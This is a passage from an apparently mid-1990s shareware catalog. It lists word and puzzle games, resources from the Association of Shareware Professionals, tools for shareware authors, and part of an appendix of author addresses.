one file included. Options: PC-sound on/off, hints, + peek, scorecards, editing menus, and more! Make, add, edit, and + erase phrase files from colorful menus with online help. Great + for foreign languages too. + + + Product: POETRY STAR + An AI poetry tutor that chats & cracks jokes. See full + description on page 457. + + Chapter 17, "Games" 631 + + + + Product: VGAWHEEL + Author: + Version: V.1.91 (12-18-93) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; VGA monitor; Hard + disk. + Strongly recommended: Mouse. + Registration fee: $10.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of mail support; bonus data. + Look for: availability unknown on BBSs; VGAWHE.ZIP on CompuServe + in CIS:PCFUN forum LIBrary 7 (or contact userID 76662,1623 for + assistance). + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + A "Wheel of Fortune"/Hangman type of word guessing game. The + game features: a colorful spinning wheel, 1-3 players, 6 rounds + of play, a sound on/off option, automatic win after all letters + have been bought and guessed, optional mouse, a high score + table for the top ten WHEELERS, and an editor to add/delete/ + modify puzzles. The editor may be used to create a custom + database for using the program as a teaching aid in grade + school through college. + + + Product: WINWHEEL + Author: + Version: 1.70 (01-16-93) + Needs: IBM AT (80286), Windows 3.0 or better. VGA monitor; Hard + disk. VBRUN100.DLL. + Strongly recommended: Mouse. + Registration fee: $19.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of support; bonus data. + Look for: availability unknown on BBSs; WINWHE.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 3 (or contact userID 76662,1623 for + assistance). + Download size: 230k (about 17 minutes with a 2400 baud modem) + Description: + A Wheel of Fortune/Hangman type word guessing game for Windows + 3.X. Features: colorful graphics, 1-3 players, 6 rounds, sound + on/off options, autowin after all letters bought and guessed, + hi-score table for top 10 WHEELERS, and a powerful puzzle + editor to add/delete/modify puzzles. + + Chapter 17, "Games" 632 + + + + 17.17.1 Crossword puzzles + + Product: Crossdown + Author: , 716-482-8092 + Version: 2.8 (05-13-93) + Needs: IBM PC, DOS 3.2 or better. 512k RAM; EGA monitor; Hard + disk; HP DeskJet printer; HP LaserJet printer; Postscript + printer; Mouse. + Strongly recommended: VGA monitor. + Registration fee: $30.75 (Canadian dollars) (add $6.00 (Canadian + dollars) for shipping to Canadian addresses) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + GEnie, newsletter, mail support; 1-month return policy; runtime + license; bonus utilities; discounts on other products. 1 free + update disk(s) sent out. Bonus puzzles. + Look for: XDOWN28.ZIP on BBSs (call 716-723-8489 to download it + at no charge); XDOWN2.ZIP on CompuServe in CIS:PCNEW forum + LIBrary 8 (or contact userID 70724,2075 for assistance); + XDOWN28.ZIP on GEnie in IBMPC forum LIBrary 15. + Download size: 507k (about 38 minutes with a 2400 baud modem) + Description: + Great graphics, animated selection buttons and sounds add to + your enjoyment as you solve real crosswords. Program makes it + easy to construct puzzles, too. Output in a variety of formats + to most printers, with standard puzzle numbering added + automatically! Author is a professional crossword constructor + and has included several of his best puzzles. Recently endorsed + by Simon and Schuster crossword editor John M. Samson! + + + Product: Crossdown for Windows + Author: , 716-482-8092 + Version: 1.1 (02-07-95) + Needs: IBM 80386, Windows 3.1 or better. 640k RAM; VGA monitor; + Hard disk; HP DeskJet printer; HP LaserJet printer; Postscript + printer; Mouse. + Registration fee: $55.75 (add $63.75 for shipping to Canadian + addresses) (add $68.75 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe, newsletter, mail support; + all ASP-wide offers (see page 5); discounts on other products. + Free puzzle construction tutoring and marketing assistance. + Look for: availability unknown on BBSs; XWDWIN.ZIP on CompuServe + in CIS:IBM forum LIBrary 8 (or contact userID 70724,2075 for + assistance). + Download size: 540k (about 40 minutes with a 2400 baud modem) + Description: + Brings all the challenge and enjoyment of solving and + constructing crosswords exactly like the ones found in the + daily or Sunday newspapers to the Windows environment, with + plenty of new and exciting features. You can click on a + scrollable clue list to highlight the appropriate word in the + grid or click anywhere on the brid to get a clue. Sound card + + Chapter 17, "Games" 633 + + + + support with speaking messages. Your favorite digital + dictionary can be accessed from within the program. + + + Product: CrossWords + Author: + Version: 1.42 (04-08-95) + Needs: IBM AT (80286), Windows 3.1 or better. VGA monitor; Hard + disk; Mouse. + Strongly recommended: sound card. + Registration fee: $10.00 (add $6.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited mail support. Bonus puzzles. + Look for: availability unknown on BBSs; CROSSW.EXE on CompuServe + in CIS:GAMERS forum LIBrary 13 (or contact userID 70602,3257 + for assistance). + SWREG#: 5910 + Download size: 226k (about 17 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + A game whose object is to guess the theme of the crossword + puzzle. Clues are given which reveal letters in the puzzle. + Players can guess at words in the puzzle or at the puzzle's + theme after they have successfully solved a clue within the + given period of time. Instructions are provided for creating + your own puzzle files. + + + Product: Enigmacross + Author: , 716-482-8092 + Version: 1.5 (06-12-93) + Needs: IBM PC, DOS 3.2 or better. 512k RAM; EGA monitor; Hard + disk; HP DeskJet printer; HP LaserJet printer; Postscript + printer; Mouse. + Strongly recommended: VGA monitor. + Registration fee: $30.75 (Canadian dollars) (add $6.00 (Canadian + dollars) for shipping to Canadian addresses) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + newsletter, mail support; 1-month return policy; runtime + license; bonus utilities; all ASP-wide offers (see page 5). 1 + free update disk(s) sent out. Bonus puzzles. + Look for: ENIGMX14.ZIP on BBSs (call 716-723-8489 to download it + at no charge); EGMX14.ZIP on CompuServe in CIS:PCNEW forum + LIBrary 8 (or contact userID 70724,2075 for assistance); + ENIGMX14.ZIP on GEnie in IBMPC forum LIBrary 15. + Download size: 443k (about 33 minutes with a 2400 baud modem) + Description: + Color graphics, animated selection buttons, sound effects + enhance very easy to use, mouse-based interface. Solve + acrostics exactly like the kind in newspapers and magazines. + Construct your own, too. Hi-quality output on most printers in + + Chapter 17, "Games" 634 + + + + a variety of formats with standard acrostic numbering added + automatically! + + + 17.17.2 Cryptanalysis + + Product: Crypto! + Author: , 716-293-3241 + Version: 2.0 (03-01-94) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $12.95 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of unlimited phone, mail support; bonus utilities; bonus + data; disks of other shareware; registration commissions. 1 + free update disk(s) sent out. Bonus quotes/phrases. + Look for: CRYPTO20.ZIP on BBSs; CRYPTO.ZIP on CompuServe in + CIS:WINFUN forum LIBrary 3 (or contact userID 74034,1441 for + assistance). + SWREG#: 2317 + Download size: 170k (about 13 minutes with a 2400 baud modem) + Description: + A Windows version of the popular cryptogram puzzles often found + in puzzle books and the Sunday paper. It selects a puzzle from + its library of 250, encrypts it, and presents it to you to + solve. It makes solving cryptograms more fun by making it easy + to try various letters and erase mistakes. Letter frequencies + are provided, and there are various hints and helps to get you + started quickly. Complete on-line help! Even my wife plays this + game; it is one of only two that she enjoys. + + Chapter 17, "Games" 635 + + + + 17.17.3 Word search + + Product: Finders Keepers + Author: + Version: 1.01 (04-08-95) + Needs: IBM 80386, Windows 3.1 or better. 640k RAM; Hard disk; + Mouse. + Strongly recommended: HP DeskJet printer; HP LaserJet printer; + Postscript printer; Epson printer; sound card. + Registration fee: $10.00 (add $2.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited mail support; bonus data; all ASP-wide + offers (see page 5). Bonus puzzles. + Look for: availability unknown on BBSs; FK100.ZIP on CompuServe + in CIS:GAMERS forum LIBrary 6 (or contact userID 70602,3257 for + assistance). + SWREG#: 5911 + Download size: 300k (about 23 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + A brand new way of looking at word find puzzles. Customize each + game by controlling how words are shown and by setting the + clock to challenge your skills. The words can be shown all at + once, one word at a time, or not at all. The clock can be set + from 30 seconds to 5 minutes, or can be turned completely off. + Select puzzles by title or at random. Enter your own puzzles + for endless entertainment. Print your favorite puzzles with + solutions. + + + Product: Word Search Puzzle Maker [***] + Author: , 619-346-6609 + Version: 2.6 (10-05-95) + Registration fee: $15.00 + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 12 months of + unlimited phone, CompuServe, mail support; 1-month return + policy; all ASP-wide offers (see page 5); discounts on other + products. Bonus word lists and shaped puzzle grids & software + package. + Look for: WSPM26.ZIP on BBSs. + Download size: 218k (about 16 minutes with a 2400 baud modem) + Description: + This powerful tool doesn't creates over 20 variations of word + search puzzles for printout. Not only that, but you can create, + save, and reuse shaped puzzle grids. Shaped grids add visual + impact and fun to your puzzles. The printed documentation that + you receive upon registration comes with instructions on how to + use WSPM to create party games, group activities, teaching + tools, and object lessons. + + Chapter 17, "Games" 636 + + + + 17.18 For adults + + Product: Edens-for-two + Author: , 703-435-5767 + Version: 4.3 (03-18-94) + Needs: IBM PC, DOS 1.0 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; Dual 720k floppy drives; Hard disk. + Registration fee: $20.00 (add $3.00 for shipping to U.S. + addresses) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, mail support; 3-month return + policy; royalty-free runtime license; all ASP-wide offers (see + page 5). 3-month free upgrading allowed. 1 free update disk(s) + sent out. + Look for: availability unknown on BBSs. + Download size: 150k (about eleven minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + Two people reconcile their dreams about where they would love + to live if they were free to move anywhere. They take turns + selecting concerns from a menu and submenus while the program + makes compromise tradeoffs and prints lists of candidate areas, + with facilities in each area. Fun - even for computer novices + Combines information from the best books on ideal places in US. + Don't read the user manual. Program is self-teaching and never + gives you any bad news. + + + 17.19 Game utilities + + Product: BassMap + Lake editor for use with BassTour/BassClass. See full + description on page 618. + + Chapter 18, "About shareware" 637 + + + + + + Chapter 18 + About shareware + + + 18.1 Assn. Shareware Professionals + + The Association of Shareware Professionals (ASP) formed in 1987 + to strengthen the future of shareware as an alternative to + traditional (retail) software marketing. It also serves as an + information clearing house for its members and the public at + large. ASP members subscribe to a code of ethics and are + committed to the shareware concept. + + The ASP demands professionalism from its members. Authors must + acknowledge every registration (you get more than just a + canceled check) and they must provide at least three months of + support for their products. ASP members must also live up to + any other benefits they offer. + + You can turn to an ombudsman for help if you can't resolve a + problem with an ASP author or disk vendor. Members must + explain this in every shareware program & disk vendor catalog. + + Few people need the ombudsman's help. ASP members represent + the cream of the crop in the shareware industry, but it's nice + to know you can turn to someone if you think you got a raw + deal. Unfortunately, it happens - authors have been kicked out + because of repeated complaints. + + The Association monitors Congress for potentially damaging + legislation and has sent spokesmen to testify before + congressional subcommittees. It has also taken on the respon- + sibility of safeguarding the term 'shareware' itself. ASP has + filed motions in countries as far away as England and South + Africa to stop people who attempt to claim it as a trademark + word. + + ASP members 'meet' online in a public forum of the CompuServe + network (GO SHAREWARE). Members send & receive messages, + transmit files, and exchange valuable information. Old hands + in the shareware business pass along their insights to new + members. The group holds public and private debates and + members vote on major issues by sending private messages to the + Association secretary. + + The ASP holds yearly 'face to face' meetings and appears at + various trade shows around the country (including COMDEX and + PC-EXPO). It also provides speakers who lecture on every + aspect of shareware. You can learn more by writing to the + Association of Shareware Professionals, 545 Grover Road, + Muskegon, MI 49442. If you have a modem and a CompuServe + + Chapter 18, "About shareware" 638 + + + + account, you can log on and go to the SHAREWARE forum for more + information. + + + Product: ASP List of Approved BBSs + Author: , 616-788-5131 + Look for: availability unknown on BBSs; ASPBBS.ZIP on CompuServe + in CIS:ASPFORUM forum LIBrary 2 (or contact userID 72050,1433 + for assistance). + Download size: 65k (about five minutes with a 2400 baud modem) + Description: + A complete list of ASP Approved BBSs. Gives the name, address, + phone number, conferences, lines, protocols, network + affiliations, etc. Formatted for use as a mailing list or for + browsing. Updated monthly. ASP recommends Approved BBSs. + + + Product: ASP List of Approved Vendors + Author: , 616-788-5131 + Look for: availability unknown on BBSs; VENDOR.ZIP on CompuServe + in CIS:ASPFORUM forum LIBrary 2 (or contact userID 72050,1433 + for assistance). + Download size: 30k (about two minutes with a 2400 baud modem) + Description: + Complete list of ASP Approved Vendors by country and state or + province. Use this catalog to find the ASP Approved Vendor + nearest you. ASP recommends ASP Approved Vendors as one of the + best sources of high quality, up-to-date shareware programs. + Updated monthly. + + + Product: ASP Vendor Member Application + Author: , 616-788-5131 + Version: n/a (06-10-92) + Look for: availability unknown on BBSs; VNDAPP.ZIP on CompuServe + in CIS:ASPFORUM forum LIBrary 4 (or contact userID 72050,1433 + for assistance). + Download size: 5k (about one minute with a 2400 baud modem) + Description: + Contains the ASP's vendor membership application kit. + + + Product: How to join as a "beta" author + Author: , 616-788-5131 + Version: n/a (11-27-89) + Look for: availability unknown on BBSs; BETA.TXT on CompuServe in + CIS:ASPFORUM forum LIBrary 4 (or contact userID 72050,1433 for + assistance). + Download size: 3k (about one minute with a 2400 baud modem) + Description: + A compilation of messages explaining how potential shareware + authors can apply for membership in the ASP before releasing + their first shareware program. + + Chapter 18, "About shareware" 639 + + + + Product: IBM PC Author Application + Author: , 616-788-5131 + Version: n/a (11-14-92) + Look for: APPLIC.ZIP on BBSs (call 317-856-2087 to download it at + no charge); AUTPUB.ZIP on CompuServe in CIS:ASPFORUM forum + LIBrary 2 (or contact userID 72050,1433 for assistance). + Download size: 40k (about three minutes with a 2400 baud modem) + Description: + Contains all information and application forms necessary for + shareware authors and publishers to become members of the + Association of Shareware Professionals. + + + Product: Information about copyrights + Author: , 616-788-5131 + Version: n/a (04-29-90) + Look for: availability unknown on BBSs; CPYRT.TXT on CompuServe + in CIS:ASPFORUM forum LIBrary 4 (or contact userID 72050,1433 + for assistance). + Download size: 3k (about one minute with a 2400 baud modem) + Description: + This will help you understand more about copyright, patent, + trademark, trade secrets and other laws that affect software + developers. Especially useful for multimedia developers or + anyone using third-party materials such as music & art. The + basic principles of the laws are explained, along wiht + information on obtaining protection, avoiding infringement, and + getting licenses. + + + Product: The Lawyer's DeskTop + Integrated legal management system. See full description on + page 312. + + Product: MacIntosh Author Application + Author: , 616-788-5131 + Version: n/a (09-03-92) + Look for: availability unknown on BBSs; APPLIC.SIT on CompuServe + in CIS:ASPFORUM forum LIBrary 6 (or contact userID 72050,1433 + for assistance). + Download size: 40k (about three minutes with a 2400 baud modem) + Description: + Information on joining the Association of Shareware + Professionals as an author member. This self-extract file + contains several necessary information files and many reasons + why you would wish to join the ASP. Specific to MacIntosh + authors - see other files in this section if you program on a + different platform (Amiga or IBM PC for example). + + Chapter 18, "About shareware" 640 + + + + Product: Official ASP Catalogs + Author: , 616-788-5131 + Look for: ASP####.ZIP on BBSs; CATLOG.ZIP on CompuServe in + CIS:ASPFORUM forum LIBrary 7 (or contact userID 70007,4004 for + assistance); GEN####.ZIP on GEnie in HOSB forum LIBrary 12 (or + contact userID R.ROSENBERGE for assistance). + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + Official catalogs of software published by ASP members. You + can download these products and use them on a "try before you + buy" basis. Each catalog describes known ASP-member products + and in many cases identifies a BBS where you can download it at + no charge for evaluation. All products grouped by subject and + cross-referenced to authors' addresses via a comprehensive + index. Main edition covers all known ASP-member shareware; + monthly subset catalogs cover CompuServe, GEnie, and Windows & + OS/2. + + + Product: Shareware Programmer's Guide + Author: , 616-788-5131 + Version: n/a (05-21-92) + Look for: availability unknown on BBSs; GUIDE.ZIP on CompuServe + in CIS:ASPFORUM forum LIBrary 2 (or contact userID 72050,1433 + for assistance). + Download size: 25k (about two minutes with a 2400 baud modem) + Description: + Contains the text of the PsL's & ASP's "Shareware Programmers' + Guide." It contains tips on writing, documenting, legally + protecting, and markeitng software via shareware. It also + lists marketing supplies and equipment and where to get them. + + + Product: Shareware Reference Guides + Author: , 616-788-5131 + Needs: IBM AT (80286), DOS 3.1 or better. Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: SRG??###.ZIP on BBSs; SRGCS.ZIP on CompuServe in + CIS:ASPFORUM forum LIBrary 7 (or contact userID 70007,4004 for + assistance); SRGGE.ZIP on GEnie in HOSB forum LIBrary 12 (or + contact userID R.ROSENBERGE for assistance). + Download size: 1200k (about 89 minutes with a 2400 baud modem) + Description: + Official ASP catalogs of software published by shareware + authors. You can download these products on a "try before you + buy" basis. Each catalog describes known shareware products + and in many cases identifies a BBS where you can download it at + no charge for evaluation. All products grouped by subject and + cross-referenced to authors' addresses. Main edition covers + all known shareware; monthly subset editions cover ASP members, + CompuServe, GEnie, DOS, OS/2, Windows, WinNT, etc. + + Chapter 18, "About shareware" 641 + + + + 18.2 For shareware authors + + Product: OWShare - Delphi + Author: , 719-531-0403 + Version: 1.0 (08-06-95) + Needs: IBM 80386, Windows 3.1 or better. 512k RAM; VGA monitor; + Hard disk; Mouse; EMS memory. + Registration fee: $59.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 12 months of fax, CompuServe, mail support; lifetime + return policy; royalty-free source code; bonus utilities; all + ASP-wide offers (see page 5); disks of other shareware; + discounts on other products; discounts on upgrades. + Look for: OWSHR_10.ZIP on BBSs (call 703-680-9269 to download it + at no charge); OWSHR.ZIP on CompuServe in CIS:WINUTIL forum + LIBrary 18 (or contact userID 75236,3243 for assistance). + Download size: 186k (about 14 minutes with a 2400 baud modem) + Description: + Release professional shareware programs by using OWShare's + Delphi source code. Supports ASP-compliant time/usage + limiting, branding, site licenses, evaluation period extensions + and more!! This demo was programmed using the OWShare code and + will allow you to easily evaluate its performance. This source + code tool kit is from Open Windows - developers of the award- + nominated WinFlash and WinUpD8R shareware programs. + + + Product: OWShare - VB + Author: , 719-531-0403 + Version: 1.0 (09-09-95) + Needs: IBM 80386, Windows 3.1 or better. VGA monitor; Hard disk; + Mouse; EMS memory; VBRUN300.DLL. + Registration fee: $59.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 12 months of fax, CompuServe, mail support; lifetime + return policy; royalty-free source code; bonus utilities; all + ASP-wide offers (see page 5); disks of other shareware; + discounts on other products; discounts on upgrades. + Look for: OWSHV_10.ZIP on BBSs (call 703-680-9269 to download it + at no charge); OWSHV.ZIP on CompuServe in CIS:WINUTIL forum + LIBrary 18 (or contact userID 75236,3243 for assistance). + Download size: 81k (about six minutes with a 2400 baud modem) + Description: + Release professional shareware programs by using OWShare's VB, + Delphi or BP7 source code. Supports ASP-compliant time/usage + limiting, branding, site licenses, evaluation period extensions + and more!! This demo was programmed using the OWShare code and + will allow you to easily evaluate its performance. This source + code tool kit is from Open Windows - developers of the award- + nominated WinFlash and WinUpD8R shareware programs. + + Chapter 18, "About shareware" 642 + + + + Product: Shareware Tracker + Author: , 317-782-9903 + Version: 3.11 (11-05-93) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; Hard disk. + Registration fee: $29.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of unlimited phone, BBS, CompuServe, mail support; + 1-month return policy; bonus utilities; all ASP-wide offers + (see page 5). + Look for: SWT311*.ZIP on BBSs (multiple files) (call 317-784-2147 + to download it at no charge); SWTRK.ZIP on CompuServe in + CIS:PCPROG forum LIBrary 6 (or contact userID 73567,1547 for + assistance). + SWREG#: 1495 + Download size: 440k (about 33 minutes with a 2400 baud modem) + Description: + An office manager for the shareware author. Will track users, + submissions, expenses, upgrade sales, tech support sales, + subscription sales, source code sales, and more. It has an + appointment calendar, a module to keep track of other important + names and addresses, and a pop-up calculator. Mail-merges + letters and labels to users, with submission, and to other + authors and dealers. Many pre-defined reports, and user can + define an unlimited number his own reports. Context sensitive + help. + + + Product: Universal Install + Software installation development kit. See full description on + page 430. + + + 18.3 For shareware disk vendors + + Product: Universal Install + Software installation development kit. See full description on + page 430. + + Chapter 18, "About shareware" 643 + + + + 18.4 Software tools & add-ins + + 18.4.1 For multiple programs + + Product: Content Label Rating + Author: + Version: 1.0 (10-08-94) + Needs: IBM PC, DOS 3.0 or better. 512k RAM. + Strongly recommended: VGA monitor; Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: CLR10.ZIP on BBSs; CLR.ZIP on CompuServe in CIS:PCVENK + forum LIBrary 9 (or contact userID 74774,403 for assistance). + Download size: 19k (about two minutes with a 2400 baud modem) + Description: + This is a system for labeling software and packaging to + indicate contents such as violence or sexual material which may + be of special concern to parents or other consumers prior to + purchase. Its purpose is to provide software authors and + publishers with a simple, inexpensive method of labeling or + rating their products for sale or distribution in retail stores + or other environments where such labeling may be needed or + required. + + Chapter 19, "Other" 644 + + + + + + Chapter 19 + Other + + + 19.1 Software tools & add-ins + + 19.1.1 For multiple programs + + Product: Content Label Rating + Software Rating System. See full description on page 643. + + 19.1.2 For other + + Product: FontMe! + Font comparison/printing. See full description on page 515. + + + 19.2 Other + + Product: The Electronic Square + Author: , 206-778-4013 + Version: 1.03 (06-19-95) + Needs: IBM PC, DOS 3.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor; Hercules monitor; Mouse. + Strongly recommended: Hard disk; EMS memory. + Registration fee: $65.00 (add $5.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); 51/4" master disk(s); 12 months of + BBS, CompuServe, mail support; all ASP-wide offers (see + page 5); discounts on other products; discounts on upgrades. + 12-month free upgrading allowed. + Look for: DANCER.ZIP on BBSs (call 206-778-5416 to download it at + no charge); DANCER.ZIP on CompuServe in CIS:MUSICARTS forum + LIBrary 18 (or contact userID 72160,1420 for assistance). + SWREG#: 4779 + PsL#: 11874 + Download size: 330k (about 25 minutes with a 2400 baud modem) + Description: + Graphically executes the commands of square dancing, currently + through C-1. A must for callers, and useful for dancers to + learn more about square dancing. + + Chapter 19, "Appendixes" 645 + + + + + + + + + + + + + + + + + + + + PART 2 + Appendixes + + Appendix A, "Author addresses" 646 + + + + + + Appendix A + Author addresses + + This appendix cross-references each author to his or her pro- + duct(s). If you want to know where to write or call about a + particular product, look for it in the index and write down the + page number where the product name appears in this appendix. + Then turn to the appropriate page in this appendix and look up + the author. + + ------------------------------------------------------ + Please note! Many authors specify a shareware regis- + tration service's phone number in the "orders only" + phone field. These registration services can only + take product orders. They cannot offer any product + support; they cannot tell you anything about a pro- + duct; they cannot send you any brochures; and they + cannot forward any messages to the author. You must + call the "queries" or "fax" numbers listed for an + author in order to obtain support or to speak with the + author. + ------------------------------------------------------ + + + Product: Units & Volumes + Author: X Libris [Kenneth L. Holladay] + Address: PO Box 19306, Plantation, FL 33318 + + Product: Kidproof for Windows + Author: Applied Softworks Inc. + Address: P.O. Box 2508, Santa Clara, CA 95055-2508 + Orders & queries: 408-554-1010 + Fax: 408-554-1010 + + Product: Time Keeper + Author: Custom Computer Solutions + Address: P.O. Box 678, Calverton, NY 11933 + Orders & queries: 516-369-4191 + Fax: 516-369-4191 + + Product: MegaCad + Author: Midnight Software, Inc. + Address: P.O. Box 77352, Seattle, WA 98177-0352 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 206-361-0796 + Queries: 206-361-0882 + + Appendix A, "Author addresses" 647 + + + + Products: Computerized Christmas Cards, Computerized Valentine + Cards, Puffwort's Evil Scheme, Visual Illustrations, Word + Search Puzzle Maker + Author: Impact D. Publishing + Address: P.O. Box 1596, Palm Desert, CA 92261 + Queries: 619-346-6609 + + Products: Exile: Escape From the Pit, Exile: Escape From the + Pit + Author: Spiderweb Software + Address: 14 Easton Avenue #202, New Brunswick, NJ 08901 + Orders: 414-963-4429 (orders only, please) + Accepts: MasterCard, Visa + Queries: 908-545-7552 + + Product: Crowndale Tales : ESCAPE! + Author: Crowndale Productions [Paul and Cynthia Lurix] + Address: P.O. Box 719, Brookshire, TX 77423 + Orders & queries: 713-346-1552 + Fax: 713-356-1607 + + Product: Mouse Math + Author: Hufnagel Software + Address: 501H Main Street, PO Box 747, Clarion, PA 16214 + Orders & queries: 814-226-5600 + Accepts: MasterCard, Visa + Fax: 814-226-5551 + + Product: FBScheduler + Author: Forrest D. Bruner + Address: 643 Washington Street, Hope, IN 47246 + Orders: 800-242-4775 (orders only, please) + + Product: Visual Computer Dictionary Plus + Author: BlueStar Software + Address: P.O. Box 33004 Beechwood Plaza, 450 Erb St. West, + Waterloo, Ont. N2T 2M9 CANADA + + Product: The Wine Window + Author: Prospect Software + Address: 1314 E. Marietta, Peoria Heights, IL 61614 + Orders & queries: 309-682-8151 + Fax: 309-682-7641 + + Product: WinCap+ + Author: The CodeWorks+ Ltd. [David Barratt,] + Address: 413, Devonshire Road, North Shore, BLACKPOOL, Lancs., + FY2 0JP, ENGLAND + + Appendix A, "Author addresses" 648 + + + + Product: DXF Bill of Materials Generator + Author: Annabec Business Services + Address: PO Box 85, Millersburg, OH 44654 + Orders & queries: 216-674-5444 + Accepts: MasterCard, Visa + Fax: 216-674-2747 + + Products: CONTRACT BRIDGE, PCDESK, PLOTTER, READ + Author: Robert Lindsay Wells + Address: 1405 Lynn Avenue, Clearwater, FL 34615 + Orders & queries: 813-447-0604 + + Product: CRISP-R REAL ESTATE ACCOUNTING + Author: JAMES W. FUNSTEN SOFTWARE + th + Address: 140 Second Street, 5 floor, San Francisco, CA 94105 + Orders & queries: 415-974-6201 + Accepts: MasterCard, Visa + Fax: 415-495-6651 + + Product: Dave Dude + Author: APG [Christian Naumann and Philipp Schroeder] + Address: Egenhoferstr. 15, 81243 Munich, GERMANY + Orders: 800-2424-PSL (orders only, please) + Accepts: Discover, MasterCard, Visa + + Products: Bootit, Extract It + Author: TeraByte Unlimited + Address: 258 N. Saturmino Dr., Palm Springs, CA 92262 + + Products: AsciiConvert, Bubble Chart, Cards+More, E-report, + Infothek (Docuthek), Infothek Information Manager, MapDraw, + MathWiz, StockQuest, WebParse, WebPen + Author: Informatik Inc. + Address: 304 Heritage Place, P.O. Box 868, Devon, PA 19333 + Orders & queries: 610.640.0339 + Fax: 610.610.0339 + + Product: The Lights Go Down + Author: Thomas Hoevel Software-Development [Thomas Hoevel] + Address: Saturnstr. 45, 53842 Troisdorf, GERMANY + Orders: 800-TOREGISTER (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Appendix A, "Author addresses" 649 + + + + Products: Folders, Link, Power Edit + Author: Target Software [Robert Brinegar] + Address: Fuji Copo 3D Wakamatsu-cho 16-4 Shinjuku, Tokyo 162, + JAPAN + Orders & queries: +81-3-3207-4553 + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: +81-3-3207-4553 + + Product: SETUP.EXE - Free 19k Bootstrap + Author: Chapter One Developments Ltd. [Mike Chapman] + Address: 27 Gorse Drive, Smallfield, Surrey RH6 9GJ ENGLAND + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: (44)-0-1342-844-659 + Queries: (44)-0-973-222937 + + Product: Playground + Author: Object International, Inc. + Address: 7301 Burnet Road, 102-259, Austin, TX 78757 + Orders: 512-795-0202 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Fax: 512-795-0332 + + Product: I Ching Empower Tool + Author: Empower Tools + Address: P.O. Box 363, Newton, IL 62448-0363 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Product: Frenetic Screensaver + Author: Seraline Pty Ltd + Address: PO Box 282, Ryde, NSW 2112, AUSTRALIA + Fax: +61-2-879-4481 + Queries: +61-2-879-4482 + + Products: INFOMANIA, JobLog Project Timekeeper + Author: Brian Sutton + Address: 8202 Cosme Road, Odessa, FL 33556 + Orders & queries: 813-920-0882 + + Products: CommEx, SuperDIR + Author: Cottonwood Software + Address: P.O. Box 6546, Leawood, KS 66206-0546 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 913-663-3747 + Queries: 913-663-3022 + + Appendix A, "Author addresses" 650 + + + + Product: J-Works + Author: MicroWorks Inc. + Address: 3913 Country Park Lane, Murfreesboro, TN 37129-4718 + Orders & queries: 615-896-3966 + Fax: 800-701-3006 + + Product: FILE_HANDLE File Management + Author: Hasoft [Arjen van Andel] + Address: Meeuwensedijk 10, 4268 GV MEEUWEN, THE NETHERLANDS + Orders & queries: +31-(0)416-351-469 + Accepts: MasterCard + Fax: +31-(0)416-351-469 + + Product: ListBuilder + Author: Younkin Enterprises + Address: P.O. Box 205, CedarBrook, NJ 08018 + Orders: 713-524-6394 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 713-524-6398 + Queries: 609-262-1097 + + Products: ACTION Process Automator, DATABASE BROWSER, GARDENING + BUSINESS, Money Organizer, WordLink(TM), Zip Server(TM) + Author: Redei Enterprises + Address: 1424 Brett Pl., Suite 359, San Pedro, CA 90732 + Orders & queries: 310-832-6984 + Fax: 310-832-6984 + + Product: Inventory Interface + Author: Data Interface + Address: 45074 Middlebury, Canton, MI 48188-3215 + Orders & queries: 313-981-3615 + Accepts: American 